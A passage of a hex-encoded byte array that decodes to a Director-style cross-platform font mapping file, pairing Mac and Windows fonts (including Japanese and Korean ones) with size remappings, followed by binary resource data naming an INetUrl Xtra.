0x69, 0x6F, 0x6E, 0x73, 0x20, 0x74, 0x6F, 0x20, 0x6D, 0x61, 0x6B, 0x65, 0x20, 0x77, 0x68, 0x65, 0x6E, 0x0D, 0x3B, 0x20, 0x6D, 0x6F, 0x76, 0x69, 0x6E, 0x67, 0x20, 0x61, 0x20, 0x6D, 0x6F, 0x76, 0x69, 0x65, 0x20, 0x66, 0x72, 0x6F, 0x6D, 0x20, 0x6F, 0x6E, 0x65, 0x20, 0x70, 0x6C, 0x61, 0x74, 0x66, 0x6F, 0x72, 0x6D, 0x20, 0x74, 0x6F, 0x20, 0x61, 0x6E, 0x6F, 0x74, 0x68, 0x65, 0x72, 0x2E, 0x0D, 0x3B, 0x0D, 0x3B, 0x20, 0x54, 0x68, 0x65, 0x20, 0x66, 0x6F, 0x72, 0x6D, 0x61, 0x74, 0x20, 0x66, 0x6F, 0x72, 0x20, 0x66, 0x6F, 0x6E, 0x74, 0x20, 0x6D, 0x61, 0x70, 0x70, 0x69, 0x6E, 0x67, 0x20, 0x64, 0x65, 0x66, 0x69, 0x6E, 0x69, 0x74, 0x69, 0x6F, 0x6E, 0x73, 0x20, 0x69, 0x73, 0x3A, 0x0D, 0x3B, 0x0D, 0x3B, 0x20, 0x50, 0x6C, 0x61, 0x74, 0x66, 0x6F, 0x72, 0x6D, 0x3A, 0x46, 0x6F, 0x6E, 0x74, 0x4E, 0x61, 0x6D, 0x65, 0x20, 0x3D, 0x3E, 0x20, 0x50, 0x6C, 0x61, 0x74, 0x66, 0x6F, 0x72, 0x6D, 0x3A, 0x46, 0x6F, 0x6E, 0x74, 0x4E, 0x61, 0x6D, 0x65, 0x20, 0x5B, 0x4D, 0x41, 0x50, 0x20, 0x4E, 0x4F, 0x4E, 0x45, 0x5D, 0x20, 0x5B, 0x6F, 0x6C, 0x64, 0x53, 0x69, 0x7A, 0x65, 0x20, 0x3D, 0x3E, 0x20, 0x6E, 0x65, 0x77, 0x53, 0x69, 0x7A, 0x65, 0x5D, 0x0D, 0x3B, 0x0D, 0x3B, 0x20, 0x20, 0x20, 0x20, 0x53, 0x70, 0x65, 0x63, 0x69, 0x66, 0x79, 0x69, 0x6E, 0x67, 0x20, 0x4D, 0x41, 0x50, 0x20, 0x4E, 0x4F, 0x4E, 0x45, 0x20, 0x74, 0x75, 0x72, 0x6E, 0x73, 0x20, 0x6F, 0x66, 0x66, 0x20, 0x63, 0x68, 0x61, 0x72, 0x61, 0x63, 0x74, 0x65, 0x72, 0x20, 0x6D, 0x61, 0x70, 0x70, 0x69, 0x6E, 0x67, 0x20, 0x66, 0x6F, 0x72, 0x20, 0x74, 0x68, 0x69, 0x73, 0x20, 0x66, 0x6F, 0x6E, 0x74, 0x2E, 0x0D, 0x3B, 0x20, 0x20, 0x20, 0x20, 0x49, 0x66, 0x20, 0x79, 0x6F, 0x75, 0x20, 0x73, 0x70, 0x65, 0x63, 0x69, 0x66, 0x79, 0x20, 0x73, 0x69, 0x7A, 0x65, 0x20, 0x6D, 0x61, 0x70, 0x70, 0x69, 0x6E, 0x67, 0x73, 0x2C, 0x20, 0x74, 0x68, 0x65, 0x79, 0x20, 0x61, 0x70, 0x70, 0x6C, 0x79, 0x20, 0x66, 0x6F, 0x72, 0x20, 0x54, 0x48, 0x41, 0x54, 0x20, 0x46, 0x4F, 0x4E, 0x54, 0x20, 0x4F, 0x4E, 0x4C, 0x59, 0x2E, 0x0D, 0x3B, 0x0D, 0x3B, 0x20, 0x48, 0x65, 0x72, 0x65, 0x20, 0x61, 0x72, 0x65, 0x20, 0x73, 0x6F, 0x6D, 0x65, 0x20, 0x74, 0x79, 0x70, 0x69, 0x63, 0x61, 0x6C, 0x20, 0x6D, 0x61, 0x70, 0x70, 0x69, 0x6E, 0x67, 0x73, 0x20, 0x66, 0x6F, 0x72, 0x20, 0x74, 0x68, 0x65, 0x20, 0x73, 0x74, 0x61, 0x6E, 0x64, 0x61, 0x72, 0x64, 0x20, 0x4D, 0x61, 0x63, 0x69, 0x6E, 0x74, 0x6F, 0x73, 0x68, 0x20, 0x66, 0x6F, 0x6E, 0x74, 0x73, 0x3A, 0x0D, 0x3B, 0x0D, 0x0D, 0x4D, 0x61, 0x63, 0x3A, 0x43, 0x68, 0x69, 0x63, 0x61, 0x67, 0x6F, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3D, 0x3E, 0x20, 0x57, 0x69, 0x6E, 0x3A, 0x53, 0x79, 0x73, 0x74, 0x65, 0x6D, 0x0D, 0x4D, 0x61, 0x63, 0x3A, 0x43, 0x6F, 0x75, 0x72, 0x69, 0x65, 0x72, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3D, 0x3E, 0x20, 0x57, 0x69, 0x6E, 0x3A, 0x22, 0x43, 0x6F, 0x75, 0x72, 0x69, 0x65, 0x72, 0x20, 0x4E, 0x65, 0x77, 0x22, 0x0D, 0x4D, 0x61, 0x63, 0x3A, 0x47, 0x65, 0x6E, 0x65, 0x76, 0x61, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3D, 0x3E, 0x20, 0x57, 0x69, 0x6E, 0x3A, 0x22, 0x4D, 0x53, 0x20, 0x53, 0x61, 0x6E, 0x73, 0x20, 0x53, 0x65, 0x72, 0x69, 0x66, 0x22, 0x0D, 0x4D, 0x61, 0x63, 0x3A, 0x48, 0x65, 0x6C, 0x76, 0x65, 0x74, 0x69, 0x63, 0x61, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3D, 0x3E, 0x20, 0x57, 0x69, 0x6E, 0x3A, 0x41, 0x72, 0x69, 0x61, 0x6C, 0x0D, 0x4D, 0x61, 0x63, 0x3A, 0x4D, 0x6F, 0x6E, 0x61, 0x63, 0x6F, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3D, 0x3E, 0x20, 0x57, 0x69, 0x6E, 0x3A, 0x54, 0x65, 0x72, 0x6D, 0x69, 0x6E, 0x61, 0x6C, 0x0D, 0x4D, 0x61, 0x63, 0x3A, 0x22, 0x4E, 0x65, 0x77, 0x20, 0x59, 0x6F, 0x72, 0x6B, 0x22, 0x20, 0x20, 0x20, 0x20, 0x3D, 0x3E, 0x20, 0x57, 0x69, 0x6E, 0x3A, 0x22, 0x4D, 0x53, 0x20, 0x53, 0x65, 0x72, 0x69, 0x66, 0x22, 0x0D, 0x4D, 0x61, 0x63, 0x3A, 0x53, 0x79, 0x6D, 0x62, 0x6F, 0x6C, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3D, 0x3E, 0x20, 0x57, 0x69, 0x6E, 0x3A, 0x53, 0x79, 0x6D, 0x62, 0x6F, 0x6C, 0x20, 0x20, 0x4D, 0x61, 0x70, 0x20, 0x4E, 0x6F, 0x6E, 0x65, 0x0D, 0x4D, 0x61, 0x63, 0x3A, 0x54, 0x69, 0x6D, 0x65, 0x73, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3D, 0x3E, 0x20, 0x57, 0x69, 0x6E, 0x3A, 0x22, 0x54, 0x69, 0x6D, 0x65, 0x73, 0x20, 0x4E, 0x65, 0x77, 0x20, 0x52, 0x6F, 0x6D, 0x61, 0x6E, 0x22, 0x20, 0x31, 0x34, 0x3D, 0x3E, 0x31, 0x32, 0x20, 0x31, 0x38, 0x3D, 0x3E, 0x31, 0x34, 0x20, 0x32, 0x34, 0x3D, 0x3E, 0x31, 0x38, 0x20, 0x33, 0x30, 0x3D, 0x3E, 0x32, 0x34, 0x0D, 0x4D, 0x61, 0x63, 0x3A, 0x50, 0x61, 0x6C, 0x61, 0x74, 0x69, 0x6E, 0x6F, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3D, 0x3E, 0x20, 0x57, 0x69, 0x6E, 0x3A, 0x22, 0x54, 0x69, 0x6D, 0x65, 0x73, 0x20, 0x4E, 0x65, 0x77, 0x20, 0x52, 0x6F, 0x6D, 0x61, 0x6E, 0x22, 0x0D, 0x0D, 0x3B, 0x0D, 0x3B, 0x20, 0x48, 0x65, 0x72, 0x65, 0x20, 0x61, 0x72, 0x65, 0x20, 0x73, 0x6F, 0x6D, 0x65, 0x20, 0x74, 0x79, 0x70, 0x69, 0x63, 0x61, 0x6C, 0x20, 0x6D, 0x61, 0x70, 0x70, 0x69, 0x6E, 0x67, 0x73, 0x20, 0x66, 0x6F, 0x72, 0x20, 0x74, 0x68, 0x65, 0x20, 0x73, 0x74, 0x61, 0x6E, 0x64, 0x61, 0x72, 0x64, 0x20, 0x57, 0x69, 0x6E, 0x64, 0x6F, 0x77, 0x73, 0x20, 0x66, 0x6F, 0x6E, 0x74, 0x73, 0x3A, 0x0D, 0x3B, 0x0D, 0x0D, 0x57, 0x69, 0x6E, 0x3A, 0x41, 0x72, 0x69, 0x61, 0x6C, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3D, 0x3E, 0x20, 0x4D, 0x61, 0x63, 0x3A, 0x48, 0x65, 0x6C, 0x76, 0x65, 0x74, 0x69, 0x63, 0x61, 0x0D, 0x57, 0x69, 0x6E, 0x3A, 0x22, 0x43, 0x6F, 0x75, 0x72, 0x69, 0x65, 0x72, 0x22, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3D, 0x3E, 0x20, 0x4D, 0x61, 0x63, 0x3A, 0x43, 0x6F, 0x75, 0x72, 0x69, 0x65, 0x72, 0x0D, 0x57, 0x69, 0x6E, 0x3A, 0x22, 0x43, 0x6F, 0x75, 0x72, 0x69, 0x65, 0x72, 0x20, 0x4E, 0x65, 0x77, 0x22, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3D, 0x3E, 0x20, 0x4D, 0x61, 0x63, 0x3A, 0x43, 0x6F, 0x75, 0x72, 0x69, 0x65, 0x72, 0x0D, 0x57, 0x69, 0x6E, 0x3A, 0x22, 0x4D, 0x53, 0x20, 0x53, 0x65, 0x72, 0x69, 0x66, 0x22, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3D, 0x3E, 0x20, 0x4D, 0x61, 0x63, 0x3A, 0x22, 0x4E, 0x65, 0x77, 0x20, 0x59, 0x6F, 0x72, 0x6B, 0x22, 0x0D, 0x57, 0x69, 0x6E, 0x3A, 0x22, 0x4D, 0x53, 0x20, 0x53, 0x61, 0x6E, 0x73, 0x20, 0x53, 0x65, 0x72, 0x69, 0x66, 0x22, 0x20, 0x20, 0x20, 0x3D, 0x3E, 0x20, 0x4D, 0x61, 0x63, 0x3A, 0x47, 0x65, 0x6E, 0x65, 0x76, 0x61, 0x0D, 0x57, 0x69, 0x6E, 0x3A, 0x53, 0x79, 0x6D, 0x62, 0x6F, 0x6C, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3D, 0x3E, 0x20, 0x4D, 0x61, 0x63, 0x3A, 0x53, 0x79, 0x6D, 0x62, 0x6F, 0x6C, 0x20, 0x20, 0x4D, 0x61, 0x70, 0x20, 0x4E, 0x6F, 0x6E, 0x65, 0x0D, 0x57, 0x69, 0x6E, 0x3A, 0x53, 0x79, 0x73, 0x74, 0x65, 0x6D, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3D, 0x3E, 0x20, 0x4D, 0x61, 0x63, 0x3A, 0x43, 0x68, 0x69, 0x63, 0x61, 0x67, 0x6F, 0x0D, 0x57, 0x69, 0x6E, 0x3A, 0x54, 0x65, 0x72, 0x6D, 0x69, 0x6E, 0x61, 0x6C, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3D, 0x3E, 0x20, 0x4D, 0x61, 0x63, 0x3A, 0x4D, 0x6F, 0x6E, 0x61, 0x63, 0x6F, 0x0D, 0x57, 0x69, 0x6E, 0x3A, 0x22, 0x54, 0x69, 0x6D, 0x65, 0x73, 0x20, 0x4E, 0x65, 0x77, 0x20, 0x52, 0x6F, 0x6D, 0x61, 0x6E, 0x22, 0x20, 0x3D, 0x3E, 0x20, 0x4D, 0x61, 0x63, 0x3A, 0x22, 0x54, 0x69, 0x6D, 0x65, 0x73, 0x22, 0x20, 0x31, 0x32, 0x3D, 0x3E, 0x31, 0x34, 0x20, 0x31, 0x34, 0x3D, 0x3E, 0x31, 0x38, 0x20, 0x31, 0x38, 0x3D, 0x3E, 0x32, 0x34, 0x20, 0x32, 0x34, 0x3D, 0x3E, 0x33, 0x30, 0x0D, 0x0D, 0x3B, 0x20, 0x4E, 0x6F, 0x74, 0x65, 0x3A, 0x20, 0x57, 0x68, 0x65, 0x6E, 0x20, 0x6D, 0x61, 0x70, 0x70, 0x69, 0x6E, 0x67, 0x20, 0x66, 0x72, 0x6F, 0x6D, 0x20, 0x57, 0x69, 0x6E, 0x64, 0x6F, 0x77, 0x73, 0x20, 0x74, 0x6F, 0x20, 0x4D, 0x61, 0x63, 0x69, 0x6E, 0x74, 0x6F, 0x73, 0x68, 0x2C, 0x20, 0x43, 0x6F, 0x75, 0x72, 0x69, 0x65, 0x72, 0x20, 0x61, 0x6E, 0x64, 0x20, 0x43, 0x6F, 0x75, 0x72, 0x69, 0x65, 0x72, 0x20, 0x4E, 0x65, 0x77, 0x20, 0x0D, 0x3B, 0x20, 0x6D, 0x61, 0x70, 0x20, 0x6F, 0x6E, 0x74, 0x6F, 0x20, 0x43, 0x6F, 0x75, 0x72, 0x69, 0x65, 0x72, 0x2E, 0x20, 0x20, 0x57, 0x68, 0x65, 0x6E, 0x20, 0x63, 0x6F, 0x6D, 0x69, 0x6E, 0x67, 0x20, 0x62, 0x61, 0x63, 0x6B, 0x20, 0x74, 0x6F, 0x20, 0x57, 0x69, 0x6E, 0x64, 0x6F, 0x77, 0x73, 0x20, 0x6F, 0x6E, 0x6C, 0x79, 0x20, 0x43, 0x6F, 0x75, 0x72, 0x69, 0x65, 0x72, 0x20, 0x4E, 0x65, 0x77, 0x0D, 0x3B, 0x20, 0x77, 0x69, 0x6C, 0x6C, 0x20, 0x62, 0x65, 0x20, 0x75, 0x73, 0x65, 0x64, 0x2E, 0x0D, 0x0D, 0x3B, 0x20, 0x4A, 0x61, 0x70, 0x61, 0x6E, 0x65, 0x73, 0x65, 0x20, 0x46, 0x6F, 0x6E, 0x74, 0x20, 0x4D, 0x61, 0x70, 0x70, 0x69, 0x6E, 0x67, 0x73, 0x0D, 0x3B, 0x20, 0x0D, 0x3B, 0x20, 0x54, 0x68, 0x65, 0x20, 0x4D, 0x61, 0x63, 0x69, 0x6E, 0x74, 0x6F, 0x73, 0x68, 0x20, 0x4A, 0x61, 0x70, 0x61, 0x6E, 0x65, 0x73, 0x65, 0x20, 0x4F, 0x73, 0x61, 0x6B, 0x61, 0x20, 0x66, 0x6F, 0x6E, 0x74, 0x20, 0x69, 0x73, 0x20, 0x6D, 0x61, 0x70, 0x70, 0x65, 0x64, 0x20, 0x74, 0x6F, 0x20, 0x61, 0x20, 0x57, 0x69, 0x6E, 0x64, 0x6F, 0x77, 0x73, 0x20, 0x66, 0x6F, 0x6E, 0x74, 0x2C, 0x20, 0x61, 0x6E, 0x64, 0x20, 0x0D, 0x3B, 0x20, 0x61, 0x6C, 0x6C, 0x20, 0x57, 0x69, 0x6E, 0x64, 0x6F, 0x77, 0x73, 0x20, 0x66, 0x6F, 0x6E, 0x74, 0x73, 0x20, 0x61, 0x72, 0x65, 0x20, 0x6D, 0x61, 0x70, 0x70, 0x65, 0x64, 0x20, 0x74, 0x6F, 0x20, 0x4D, 0x61, 0x63, 0x69, 0x6E, 0x74, 0x6F, 0x73, 0x68, 0x27, 0x73, 0x20, 0x4F, 0x73, 0x61, 0x6B, 0x61, 0x2E, 0x20, 0x20, 0x4D, 0x61, 0x70, 0x20, 0x4E, 0x6F, 0x6E, 0x65, 0x20, 0x69, 0x73, 0x20, 0x75, 0x73, 0x65, 0x64, 0x0D, 0x3B, 0x20, 0x62, 0x65, 0x63, 0x61, 0x75, 0x73, 0x65, 0x20, 0x6F, 0x6E, 0x6C, 0x79, 0x20, 0x52, 0x6F, 0x6D, 0x61, 0x6E, 0x20, 0x66, 0x6F, 0x6E, 0x74, 0x73, 0x20, 0x6E, 0x65, 0x65, 0x64, 0x20, 0x75, 0x70, 0x70, 0x65, 0x72, 0x2D, 0x41, 0x53, 0x43, 0x49, 0x49, 0x20, 0x63, 0x68, 0x61, 0x72, 0x61, 0x63, 0x74, 0x65, 0x72, 0x73, 0x20, 0x6D, 0x61, 0x70, 0x70, 0x65, 0x64, 0x2E, 0x20, 0x20, 0x54, 0x6F, 0x20, 0x70, 0x72, 0x65, 0x76, 0x65, 0x6E, 0x74, 0x20, 0x0D, 0x3B, 0x20, 0x6D, 0x61, 0x70, 0x70, 0x69, 0x6E, 0x67, 0x20, 0x6F, 0x66, 0x20, 0x61, 0x6E, 0x79, 0x20, 0x61, 0x64, 0x64, 0x69, 0x74, 0x69, 0x6F, 0x6E, 0x61, 0x6C, 0x20, 0x4A, 0x61, 0x70, 0x61, 0x6E, 0x65, 0x73, 0x65, 0x20, 0x66, 0x6F, 0x6E, 0x74, 0x73, 0x2C, 0x20, 0x61, 0x64, 0x64, 0x20, 0x74, 0x68, 0x65, 0x6D, 0x20, 0x74, 0x6F, 0x20, 0x74, 0x68, 0x69, 0x73, 0x20, 0x6C, 0x69, 0x73, 0x74, 0x2E, 0x0D, 0x3B, 0x0D, 0x3B, 0x20, 0x4E, 0x6F, 0x74, 0x65, 0x3A, 0x20, 0x49, 0x66, 0x20, 0x79, 0x6F, 0x75, 0x20, 0x64, 0x6F, 0x20, 0x6E, 0x6F, 0x74, 0x20, 0x68, 0x61, 0x76, 0x65, 0x20, 0x61, 0x20, 0x4A, 0x61, 0x70, 0x61, 0x6E, 0x65, 0x73, 0x65, 0x20, 0x73, 0x79, 0x73, 0x74, 0x65, 0x6D, 0x2C, 0x20, 0x74, 0x68, 0x65, 0x20, 0x66, 0x6F, 0x6E, 0x74, 0x20, 0x6E, 0x61, 0x6D, 0x65, 0x73, 0x20, 0x62, 0x65, 0x6C, 0x6F, 0x77, 0x20, 0x0D, 0x3B, 0x20, 0x77, 0x69, 0x6C, 0x6C, 0x20, 0x61, 0x70, 0x70, 0x65, 0x61, 0x72, 0x20, 0x74, 0x6F, 0x20, 0x62, 0x65, 0x20, 0x75, 0x6E, 0x72, 0x65, 0x61, 0x64, 0x61, 0x62, 0x6C, 0x65, 0x2E, 0x0D, 0x4D, 0x61, 0x63, 0x3A, 0x4F, 0x73, 0x61, 0x6B, 0x61, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3D, 0x3E, 0x20, 0x57, 0x69, 0x6E, 0x3A, 0x22, 0xEF, 0xBC, 0xAD, 0xEF, 0xBC, 0xB3, 0x20, 0xE3, 0x82, 0xB4, 0xE3, 0x82, 0xB7, 0xE3, 0x83, 0x83, 0xE3, 0x82, 0xAF, 0x22, 0x20, 0x4D, 0x61, 0x70, 0x20, 0x4E, 0x6F, 0x6E, 0x65, 0x0D, 0x0D, 0x57, 0x69, 0x6E, 0x3A, 0x22, 0xEF, 0xBC, 0xAD, 0xEF, 0xBC, 0xB3, 0x20, 0xE3, 0x82, 0xB4, 0xE3, 0x82, 0xB7, 0xE3, 0x83, 0x83, 0xE3, 0x82, 0xAF, 0x22, 0x20, 0x3D, 0x3E, 0x20, 0x4D, 0x61, 0x63, 0x3A, 0x4F, 0x73, 0x61, 0x6B, 0x61, 0x20, 0x4D, 0x61, 0x70, 0x20, 0x4E, 0x6F, 0x6E, 0x65, 0x0D, 0x57, 0x69, 0x6E, 0x3A, 0x22, 0xEF, 0xBC, 0xAD, 0xEF, 0xBC, 0xB3, 0x20, 0xE6, 0x98, 0x8E, 0xE6, 0x9C, 0x9D, 0x22, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3D, 0x3E, 0x20, 0x4D, 0x61, 0x63, 0x3A, 0x4F, 0x73, 0x61, 0x6B, 0x61, 0x20, 0x4D, 0x61, 0x70, 0x20, 0x4E, 0x6F, 0x6E, 0x65, 0x0D, 0x57, 0x69, 0x6E, 0x3A, 0x22, 0xE6, 0xA8, 0x99, 0xE6, 0xBA, 0x96, 0xE3, 0x82, 0xB4, 0xE3, 0x82, 0xB7, 0xE3, 0x83, 0x83, 0xE3, 0x82, 0xAF, 0x22, 0x20, 0x20, 0x3D, 0x3E, 0x20, 0x4D, 0x61, 0x63, 0x3A, 0x4F, 0x73, 0x61, 0x6B, 0x61, 0x20, 0x4D, 0x61, 0x70, 0x20, 0x4E, 0x6F, 0x6E, 0x65, 0x0D, 0x57, 0x69, 0x6E, 0x3A, 0x22, 0xE6, 0xA8, 0x99, 0xE6, 0xBA, 0x96, 0xE6, 0x98, 0x8E, 0xE6, 0x9C, 0x9D, 0x22, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3D, 0x3E, 0x20, 0x4D, 0x61, 0x63, 0x3A, 0x4F, 0x73, 0x61, 0x6B, 0x61, 0x20, 0x4D, 0x61, 0x70, 0x20, 0x4E, 0x6F, 0x6E, 0x65, 0x0D, 0x57, 0x69, 0x6E, 0x3A, 0x22, 0xE6, 0x98, 0x8E, 0xE6, 0x9C, 0x9D, 0x22, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3D, 0x3E, 0x20, 0x4D, 0x61, 0x63, 0x3A, 0x4F, 0x73, 0x61, 0x6B, 0x61, 0x20, 0x4D, 0x61, 0x70, 0x20, 0x4E, 0x6F, 0x6E, 0x65, 0x0D, 0x0D, 0x3B, 0x20, 0x4B, 0x6F, 0x72, 0x65, 0x61, 0x6E, 0x20, 0x46, 0x6F, 0x6E, 0x74, 0x20, 0x4D, 0x61, 0x70, 0x70, 0x69, 0x6E, 0x67, 0x73, 0x0D, 0x4D, 0x61, 0x63, 0x3A, 0x41, 0x70, 0x70, 0x6C, 0x65, 0x47, 0x6F, 0x74, 0x68, 0x69, 0x63, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3D, 0x3E, 0x20, 0x57, 0x69, 0x6E, 0x3A, 0x22, 0xEA, 0xB5, 0xB4, 0xEB, 0xA6, 0xBC, 0x22, 0x20, 0x4D, 0x61, 0x70, 0x20, 0x4E, 0x6F, 0x6E, 0x65, 0x0D, 0x4D, 0x61, 0x63, 0x3A, 0x53, 0x65, 0x6F, 0x75, 0x6C, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3D, 0x3E, 0x20, 0x57, 0x69, 0x6E, 0x3A, 0x22, 0xEA, 0xB6, 0x81, 0xEC, 0x84, 0x9C, 0x22, 0x20, 0x4D, 0x61, 0x70, 0x20, 0x4E, 0x6F, 0x6E, 0x65, 0x0D, 0x4D, 0x61, 0x63, 0x3A, 0x41, 0x70, 0x70, 0x6C, 0x65, 0x4D, 0x79, 0x75, 0x6E, 0x67, 0x69, 0x6F, 0x20, 0x20, 0x20, 0x20, 0x3D, 0x3E, 0x20, 0x57, 0x69, 0x6E, 0x3A, 0x22, 0xEB, 0x8F, 0x8B, 0xEC, 0x9B, 0x80, 0x22, 0x20, 0x4D, 0x61, 0x70, 0x20, 0x4E, 0x6F, 0x6E, 0x65, 0x0D, 0x4D, 0x61, 0x63, 0x3A, 0x22, 0xED, 0x95, 0x9C, 0xEA, 0xB0, 0x95, 0xEC, 0xB2, 0xB4, 0x22, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3D, 0x3E, 0x20, 0x57, 0x69, 0x6E, 0x3A, 0x22, 0xEB, 0xB0, 0x94, 0xED, 0x83, 0x95, 0x22, 0x20, 0x4D, 0x61, 0x70, 0x20, 0x4E, 0x6F, 0x6E, 0x65, 0x0D, 0x0D, 0x57, 0x69, 0x6E, 0x3A, 0x22, 0xEA, 0xB5, 0xB4, 0xEB, 0xA6, 0xBC, 0x22, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3D, 0x3E, 0x20, 0x4D, 0x61, 0x63, 0x3A, 0x41, 0x70, 0x70, 0x6C, 0x65, 0x47, 0x6F, 0x74, 0x68, 0x69, 0x63, 0x20, 0x4D, 0x61, 0x70, 0x20, 0x4E, 0x6F, 0x6E, 0x65, 0x0D, 0x57, 0x69, 0x6E, 0x3A, 0x22, 0xEA, 0xB5, 0xB4, 0xEB, 0xA6, 0xBC, 0xEC, 0xB2, 0xB4, 0x22, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3D, 0x3E, 0x20, 0x4D, 0x61, 0x63, 0x3A, 0x41, 0x70, 0x70, 0x6C, 0x65, 0x47, 0x6F, 0x74, 0x68, 0x69, 0x63, 0x20, 0x4D, 0x61, 0x70, 0x20, 0x4E, 0x6F, 0x6E, 0x65, 0x0D, 0x57, 0x69, 0x6E, 0x3A, 0x22, 0xEA, 0xB6, 0x81, 0xEC, 0x84, 0x9C, 0x22, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3D, 0x3E, 0x20, 0x4D, 0x61, 0x63, 0x3A, 0x53, 0x65, 0x6F, 0x75, 0x6C, 0x20, 0x4D, 0x61, 0x70, 0x20, 0x4E, 0x6F, 0x6E, 0x65, 0x0D, 0x57, 0x69, 0x6E, 0x3A, 0x22, 0xEA, 0xB6, 0x81, 0xEC, 0x84, 0x9C, 0xEC, 0xB2, 0xB4, 0x22, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3D, 0x3E, 0x20, 0x4D, 0x61, 0x63, 0x3A, 0x53, 0x65, 0x6F, 0x75, 0x6C, 0x20, 0x4D, 0x61, 0x70, 0x20, 0x4E, 0x6F, 0x6E, 0x65, 0x0D, 0x57, 0x69, 0x6E, 0x3A, 0x22, 0xEB, 0x8F, 0x8B, 0xEC, 0x9B, 0x80, 0x22, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3D, 0x3E, 0x20, 0x4D, 0x61, 0x63, 0x3A, 0x41, 0x70, 0x70, 0x6C, 0x65, 0x4D, 0x79, 0x75, 0x6E, 0x67, 0x69, 0x6F, 0x20, 0x4D, 0x61, 0x70, 0x20, 0x4E, 0x6F, 0x6E, 0x65, 0x0D, 0x57, 0x69, 0x6E, 0x3A, 0x22, 0xEB, 0x8F, 0x8B, 0xEC, 0x9B, 0x80, 0xEC, 0xB2, 0xB4, 0x22, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3D, 0x3E, 0x20, 0x4D, 0x61, 0x63, 0x3A, 0x41, 0x70, 0x70, 0x6C, 0x65, 0x4D, 0x79, 0x75, 0x6E, 0x67, 0x69, 0x6F, 0x20, 0x4D, 0x61, 0x70, 0x20, 0x4E, 0x6F, 0x6E, 0x65, 0x0D, 0x57, 0x69, 0x6E, 0x3A, 0x22, 0xEB, 0xB0, 0x94, 0xED, 0x83, 0x95, 0x22, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3D, 0x3E, 0x20, 0x4D, 0x61, 0x63, 0x3A, 0x22, 0xED, 0x95, 0x9C, 0xEA, 0xB0, 0x95, 0xEC, 0xB2, 0xB4, 0x22, 0x20, 0x4D, 0x61, 0x70, 0x20, 0x4E, 0x6F, 0x6E, 0x65, 0x0D, 0x57, 0x69, 0x6E, 0x3A, 0x22, 0xEB, 0xB0, 0x94, 0xED, 0x83, 0x95, 0xEC, 0xB2, 0xB4, 0x22, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3D, 0x3E, 0x20, 0x4D, 0x61, 0x63, 0x3A, 0x22, 0xED, 0x95, 0x9C, 0xEA, 0xB0, 0x95, 0xEC, 0xB2, 0xB4, 0x22, 0x20, 0x4D, 0x61, 0x70, 0x20, 0x4E, 0x6F, 0x6E, 0x65, 0x0D, 0x00, 0x6C, 0x52, 0x54, 0x58, 0x83, 0x04, 0x00, 0x00, 0x08, 0x05, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x49, 0x00, 0x00, 0x00, 0x18, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x14, 0x00, 0x00, 0x00, 0x23, 0x06, 0x02, 0x10, 0x49, 0x4E, 0x65, 0x74, 0x55, 0x72, 0x6C, 0x20, 0x50, 0x50, 0x43, 0x20, 0x58, 0x74, 0x72, 0x61, 0x00, 0x06, 0x05, 0x0B, 0x49, 0x4E, 0x45, 0x54, 0x55, 0x52, 0x4C, 0x2E, 0x58, 0x33, 0x32, 0x00, 0x00, 0x00, 0x00, 0x49, 0x00, 0x00, 0x00, 0x18, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x14, 0x00, 0x00, 0x00, 0x23, 0x06, 0x02, 0x10, 0x4E, 